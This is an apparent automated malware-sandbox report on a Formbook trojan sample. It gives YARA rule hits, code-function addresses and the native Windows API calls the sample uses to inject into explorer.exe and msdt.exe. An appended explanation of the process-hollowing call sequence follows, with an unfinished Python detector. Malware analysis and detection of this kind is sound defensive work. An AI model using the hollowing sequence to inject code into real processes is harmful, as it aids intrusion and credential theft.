Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A81030 0_2_00A81030
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9E866 0_2_00A9E866
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9E1F5 0_2_00A9E1F5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D5AD 0_2_00A9D5AD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A82D8E 0_2_00A82D8E
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A82D90 0_2_00A82D90
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9ED31 0_2_00A9ED31
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89E50 0_2_00A89E50
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A82FB0 0_2_00A82FB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171F900 0_2_0171F900
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D1002 0_2_017D1002
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E28EC 0_2_017E28EC
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E20A8 0_2_017E20A8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B090 0_2_0172B090
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E2B28 0_2_017E2B28
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DDBD2 0_2_017DDBD2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174EBB0 0_2_0174EBB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E22AE 0_2_017E22AE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E1D55 0_2_017E1D55
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01710D20 0_2_01710D20
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E2D07 0_2_017E2D07
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172D5E0 0_2_0172D5E0
Source: C:\Windows\explorer.exe Code function: 1_2_0E173232 1_2_0E173232
Source: C:\Windows\explorer.exe Code function: 1_2_0E16DB32 1_2_0E16DB32
Source: C:\Windows\explorer.exe Code function: 1_2_0E16DB30 1_2_0E16DB30
Source: C:\Windows\explorer.exe Code function: 1_2_0E172036 1_2_0E172036
Source: C:\Windows\explorer.exe Code function: 1_2_0E169082 1_2_0E169082
Source: C:\Windows\explorer.exe Code function: 1_2_0E170912 1_2_0E170912
Source: C:\Windows\explorer.exe Code function: 1_2_0E16AD02 1_2_0E16AD02
Source: C:\Windows\explorer.exe Code function: 1_2_0E1765CD 1_2_0E1765CD
Source: C:\Windows\explorer.exe Code function: 1_2_100D8232 1_2_100D8232
Source: C:\Windows\explorer.exe Code function: 1_2_100D7036 1_2_100D7036
Source: C:\Windows\explorer.exe Code function: 1_2_100CE082 1_2_100CE082
Source: C:\Windows\explorer.exe Code function: 1_2_100CFD02 1_2_100CFD02
Source: C:\Windows\explorer.exe Code function: 1_2_100D5912 1_2_100D5912
Source: C:\Windows\explorer.exe Code function: 1_2_100D2B30 1_2_100D2B30
Source: C:\Windows\explorer.exe Code function: 1_2_100D2B32 1_2_100D2B32
Source: C:\Windows\explorer.exe Code function: 1_2_100DB5CD 1_2_100DB5CD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B920A8 2_2_04B920A8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB090 2_2_04ADB090
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B928EC 2_2_04B928EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD841F 2_2_04AD841F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81002 2_2_04B81002
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADD5E0 2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B925DD 2_2_04B925DD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC0D20 2_2_04AC0D20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACF900 2_2_04ACF900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B92D07 2_2_04B92D07
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B91D55 2_2_04B91D55
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B922AE 2_2_04B922AE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B92EF7 2_2_04B92EF7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE6E30 2_2_04AE6E30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFEBB0 2_2_04AFEBB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B91FF1 2_2_04B91FF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8DBD2 2_2_04B8DBD2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B92B28 2_2_04B92B28
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E866 2_2_0059E866
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00582D90 2_2_00582D90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00582D8E 2_2_00582D8E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D5AD 2_2_0059D5AD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00589E50 2_2_00589E50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00582FB0 2_2_00582FB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 04ACB150 appears 35 times
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A350 NtCreateFile, 0_2_00A9A350
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A480 NtClose, 0_2_00A9A480
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A400 NtReadFile, 0_2_00A9A400
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A530 NtAllocateVirtualMemory, 0_2_00A9A530
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A3FB NtReadFile, 0_2_00A9A3FB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A47A NtClose, 0_2_00A9A47A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759910 NtAdjustPrivilegesToken,LdrInitializeThunk, 0_2_01759910
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017599A0 NtCreateSection,LdrInitializeThunk, 0_2_017599A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759860 NtQuerySystemInformation,LdrInitializeThunk, 0_2_01759860
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759840 NtDelayExecution,LdrInitializeThunk, 0_2_01759840
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017598F0 NtReadVirtualMemory,LdrInitializeThunk, 0_2_017598F0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A50 NtCreateFile,LdrInitializeThunk, 0_2_01759A50
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A20 NtResumeThread,LdrInitializeThunk, 0_2_01759A20
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A00 NtProtectVirtualMemory,LdrInitializeThunk, 0_2_01759A00
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759540 NtReadFile,LdrInitializeThunk, 0_2_01759540
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017595D0 NtClose,LdrInitializeThunk, 0_2_017595D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759710 NtQueryInformationToken,LdrInitializeThunk, 0_2_01759710
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017597A0 NtUnmapViewOfSection,LdrInitializeThunk, 0_2_017597A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759780 NtMapViewOfSection,LdrInitializeThunk, 0_2_01759780
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759660 NtAllocateVirtualMemory,LdrInitializeThunk, 0_2_01759660
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017596E0 NtFreeVirtualMemory,LdrInitializeThunk, 0_2_017596E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759950 NtQueueApcThread, 0_2_01759950
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017599D0 NtCreateProcessEx, 0_2_017599D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175B040 NtSuspendThread, 0_2_0175B040
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759820 NtEnumerateKey, 0_2_01759820
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017598A0 NtWriteVirtualMemory, 0_2_017598A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759B00 NtSetValueKey, 0_2_01759B00
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175A3B0 NtGetContextThread, 0_2_0175A3B0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A10 NtQuerySection, 0_2_01759A10
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A80 NtOpenDirectoryObject, 0_2_01759A80
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759560 NtWriteFile, 0_2_01759560
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175AD30 NtSetContextThread, 0_2_0175AD30
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759520 NtWaitForSingleObject, 0_2_01759520
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017595F0 NtQueryInformationFile, 0_2_017595F0
Source: C:\Windows\explorer.exe Code function: 1_2_100D9E12 NtProtectVirtualMemory, 1_2_100D9E12
Source: C:\Windows\explorer.exe Code function: 1_2_100D8232 NtCreateFile, 1_2_100D8232
Source: C:\Windows\explorer.exe Code function: 1_2_100D9E0A NtProtectVirtualMemory, 1_2_100D9E0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_04B09860
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09840 NtDelayExecution,LdrInitializeThunk, 2_2_04B09840
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B099A0 NtCreateSection,LdrInitializeThunk, 2_2_04B099A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B095D0 NtClose,LdrInitializeThunk, 2_2_04B095D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_04B09910
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09540 NtReadFile,LdrInitializeThunk, 2_2_04B09540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_04B096E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B096D0 NtCreateKey,LdrInitializeThunk, 2_2_04B096D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_04B09660
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09650 NtQueryValueKey,LdrInitializeThunk, 2_2_04B09650
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A50 NtCreateFile,LdrInitializeThunk, 2_2_04B09A50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09780 NtMapViewOfSection,LdrInitializeThunk, 2_2_04B09780
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09FE0 NtCreateMutant,LdrInitializeThunk, 2_2_04B09FE0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09710 NtQueryInformationToken,LdrInitializeThunk, 2_2_04B09710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B098A0 NtWriteVirtualMemory, 2_2_04B098A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B098F0 NtReadVirtualMemory, 2_2_04B098F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09820 NtEnumerateKey, 2_2_04B09820
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0B040 NtSuspendThread, 2_2_04B0B040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B095F0 NtQueryInformationFile, 2_2_04B095F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B099D0 NtCreateProcessEx, 2_2_04B099D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0AD30 NtSetContextThread, 2_2_04B0AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09520 NtWaitForSingleObject, 2_2_04B09520
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09560 NtWriteFile, 2_2_04B09560
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09950 NtQueueApcThread, 2_2_04B09950
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A80 NtOpenDirectoryObject, 2_2_04B09A80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A20 NtResumeThread, 2_2_04B09A20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09610 NtEnumerateValueKey, 2_2_04B09610
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A10 NtQuerySection, 2_2_04B09A10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A00 NtProtectVirtualMemory, 2_2_04B09A00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09670 NtQueryInformationProcess, 2_2_04B09670
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0A3B0 NtGetContextThread, 2_2_04B0A3B0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B097A0 NtUnmapViewOfSection, 2_2_04B097A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09730 NtQueryVirtualMemory, 2_2_04B09730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0A710 NtOpenProcessToken, 2_2_04B0A710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09B00 NtSetValueKey, 2_2_04B09B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09770 NtSetInformationFile, 2_2_04B09770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0A770 NtOpenThread, 2_2_04B0A770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09760 NtOpenProcess, 2_2_04B09760
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A350 NtCreateFile, 2_2_0059A350
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A400 NtReadFile, 2_2_0059A400
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A480 NtClose, 2_2_0059A480
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A530 NtAllocateVirtualMemory, 2_2_0059A530
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A3FB NtReadFile, 2_2_0059A3FB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A47A NtClose, 2_2_0059A47A
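The native calls listed above are the building blocks of the process hollowing the report flags: a process is created suspended (NtCreateProcessEx), its original image is unmapped (NtUnmapViewOfSection), the payload is staged and written (NtAllocateVirtualMemory or NtMapViewOfSection, then NtWriteVirtualMemory), the thread is pointed at it (NtSetContextThread, or an APC via NtQueueApcThread) and resumed (NtResumeThread). What follows is an added example, not part of the report or of any vendor tooling: it correlates an API trace per target process and reports only targets that reach every mandatory stage in order. The trace is constructed; the PIDs are the report's (sample 6000, explorer.exe 3452, msdt.exe 5148), but the report does not say which process each call targeted, so that mapping is an assumption.

```python
from collections import defaultdict

# Stages of process hollowing, each satisfied by any of the native calls
# listed for the stage. Calls that appear in no set are ignored.
HOLLOWING_STAGES = (
    ("create_suspended", {"NtCreateProcessEx", "NtCreateUserProcess"}),
    ("unmap_original",   {"NtUnmapViewOfSection"}),
    ("stage_payload",    {"NtAllocateVirtualMemory", "NtMapViewOfSection"}),
    ("write_payload",    {"NtWriteVirtualMemory"}),
    ("redirect_entry",   {"NtSetContextThread", "NtQueueApcThread"}),
    ("run",              {"NtResumeThread"}),
)
# Stages that must all be seen, in this order, for a target process.
# Unmapping and explicit allocation are optional: some loaders map a
# section over the original image instead of allocating.
MANDATORY = ("create_suspended", "write_payload", "redirect_entry", "run")


def hollowing_verdict(events):
    """events: (caller_pid, api_name, target_pid) tuples in trace order.

    Returns {target_pid: [stages in the order first observed]} for every
    target that reached all mandatory stages in the right order."""
    first_seen = defaultdict(dict)      # target_pid -> {stage: trace index}
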